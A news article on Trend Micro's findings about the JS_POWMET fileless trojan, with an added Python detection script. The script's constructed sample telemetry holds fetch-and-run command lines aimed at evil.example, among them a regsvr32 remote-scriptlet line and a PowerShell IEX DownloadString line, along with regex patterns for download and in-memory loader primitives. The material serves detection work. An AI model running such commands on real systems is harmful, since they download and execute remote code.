Friday, June 25, 2021

Be on the lookout for fileless malware, warns Trend Micro

Infosec pros spend most of their time dealing with the usual threats that pop up on networks every day. Attackers, on the other hand, spend their time figuring out new ways to evade detection. One of the newer ways is fileless malware: code that lives in memory and in the registry rather than as an executable on disk, so that sandbox and file-scanning defences looking for a malicious file's signature have nothing to inspect.

Trend Micro has detected an example of this threat which, while it has little impact in itself, is a warning of what is coming.

The security vendor dubs this particular trojan JS_POWMET. The attack starts with a change to the Windows Registry (Trend Micro suspects the initial component is downloaded when users visit malicious sites, or is dropped by other malware) that adds an autostart entry. On start-up that entry pulls JS_POWMET from a command-and-control server. Because the autostart entry executes the downloaded script directly, the XML file it fetches is never saved on the machine, and arbitrary scripts can be run without leaving a file for scanners to find.

Once JS_POWMET executes, it downloads another file, TROJ_PSINJECT, a PowerShell script that runs inside the PowerShell process. TROJ_PSINJECT connects to a website and downloads a seemingly ordinary file named favicon. That file is then decrypted and injected into the PowerShell process using ReflectivePELoader, a technique for loading EXE/DLL files into memory without writing them to disk.
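The chain above (an autostart entry that runs a remote script, a PowerShell stage that fetches "favicon", a payload reflectively loaded into PowerShell) leaves no malicious file to scan, but it does leave registry persistence and process-creation telemetry. The following Python script is an added example, not Trend Micro's code and not part of the original article: it runs simple indicator matching over constructed autorun entries and process-creation records with the fields Sysmon event 1 or Security event 4688 provide. All sample data is made up: evil.example is a placeholder host, the encoded command is just "IEX", and the regsvr32/scrobj.dll command is one assumed form of an autostart entry that executes a remote scriptlet without writing it to disk, since the article does not name the mechanism JS_POWMET uses.

```python
"""Heuristic triage for a JS_POWMET-style fileless chain (added example).

Two constructed inputs stand in for real telemetry: autostart (Run key)
entries as an autoruns or registry export would list them, and
process-creation records as Sysmon event 1 / Security 4688 provide them.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple


@dataclass
class Finding:
    subject: str        # registry value or "pid:image" that was flagged
    reasons: List[str]  # indicator labels that fired


# Windows script hosts that can fetch and run code without writing a PE to disk.
HOST_RE = re.compile(
    r"\b(powershell|pwsh|wscript|cscript|mshta|regsvr32|rundll32)(?:\.exe)?\b", re.I)

# Command-line indicators. None is conclusive alone; process triage below
# requires at least two before it reports a process.
INDICATORS = [
    (re.compile(r"https?://", re.I), "remote URL on command line"),
    (re.compile(r"\bregsvr32(?:\.exe)?\b.*?/i:", re.I), "regsvr32 /i: (remote scriptlet)"),
    (re.compile(r"\bscrobj\.dll\b", re.I), "scrobj.dll scriptlet host"),
    (re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s", re.I), "encoded PowerShell command"),
    (re.compile(r"\s-nop\b|\s-noprofile\b", re.I), "-NoProfile"),
    (re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"\s-exec(?:utionpolicy)?\s+bypass\b", re.I), "execution policy bypass"),
    (re.compile(r"downloadstring|downloaddata|invoke-webrequest|\biwr\b", re.I), "download primitive"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "Invoke-Expression"),
    (re.compile(r"\[reflection\.assembly\]::load|virtualalloc|createthread", re.I), "in-memory loader primitive"),
]


def script_host(text: str) -> Optional[str]:
    """Name of the first script host mentioned in text, or None."""
    m = HOST_RE.search(text)
    return m.group(1).lower() if m else None


def match_indicators(command: str) -> List[str]:
    """Labels of every indicator that fires on a command line."""
    return [label for rx, label in INDICATORS if rx.search(command)]


def triage_autoruns(entries: Iterable[Tuple[str, str, str]]) -> List[Finding]:
    """Flag persistence entries that launch a script host with any indicator.
    Persistence via a script host is rare enough that one hit is worth a look."""
    findings = []
    for location, name, command in entries:
        reasons = match_indicators(command) if script_host(command) else []
        if reasons:
            findings.append(Finding(f"{location}\\{name}", reasons))
    return findings


def triage_process_events(events: Iterable[Dict[str, object]], min_hits: int = 2) -> List[Finding]:
    """Report script-host processes whose command line plus lineage trips at
    least min_hits indicators. A script host spawned by another script host
    counts as a hit, because stage chaining is how this sample runs."""
    findings = []
    for ev in events:
        image = str(ev["Image"]).rsplit("\\", 1)[-1]
        if not script_host(image):
            continue
        reasons = match_indicators(str(ev["CommandLine"]))
        parent = script_host(str(ev.get("ParentImage", "")).rsplit("\\", 1)[-1])
        if parent:
            reasons.append(f"spawned by script host {parent}")
        if len(reasons) >= min_hits:
            findings.append(Finding(f"{ev['ProcessId']}:{image}", reasons))
    return findings


# Constructed sample data (not real telemetry). evil.example is a placeholder;
# the regsvr32/scrobj.dll line is an assumed form of a remote-scriptlet autostart.
RUN = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
AUTORUNS = [
    (RUN, "OneDrive", r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (RUN, "Updater", r"regsvr32 /s /n /u /i:http://evil.example/init.sct scrobj.dll"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\system32\SecurityHealthSystray.exe"),
]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
    {"ProcessId": 4388, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://evil.example/init.sct scrobj.dll"},
    {"ProcessId": 4402, "ParentImage": r"C:\Windows\System32\regsvr32.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand SQBFAFgA"},
    {"ProcessId": 4510, "ParentImage": PS, "Image": PS,
     "CommandLine": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://evil.example/favicon')\""},
    {"ProcessId": 4600, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},  # routine admin use
]

if __name__ == "__main__":
    for f in triage_autoruns(AUTORUNS) + triage_process_events(EVENTS):
        print(f.subject, "->", "; ".join(f.reasons))
```

The two thresholds are deliberate: a persistence entry that launches a script host is reported on a single indicator, while a running process needs two, so the routine `-NoProfile -File` administrative invocation in the sample passes and the regsvr32 and PowerShell stages are reported. In practice the lists would be fed from autoruns output and the Sysmon or 4688 event stream, and the indicator table tuned to whatever legitimate PowerShell use exists in the environment.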

Figure 1 (Trend Micro graphic)

The malware then runs a number of routines through PowerShell commands. Among other things it gathers system information, including whether it holds administrator privileges, the root volume serial number, the operating system version and the IP address. Trend Micro warns that the JS_POWMET authors could easily extend the chain to deliver additional malware.

Trend Micro says one of the more effective methods for mitigating fileless malware is to limit access to critical infrastructure through container-based systems that separate endpoints from the most important parts of the network. For this specific malware, consider disabling PowerShell itself where it is clear that other Windows components do not need it; PowerShell underpins a good deal of legitimate administration, so confirm what depends on it before doing so.


“Organizations and users should always look beyond the obvious malware files and always be on the lookout for “stealthy” malware that manages to slip into the system virtually unnoticed,” the vendor warns.

Howard Solomon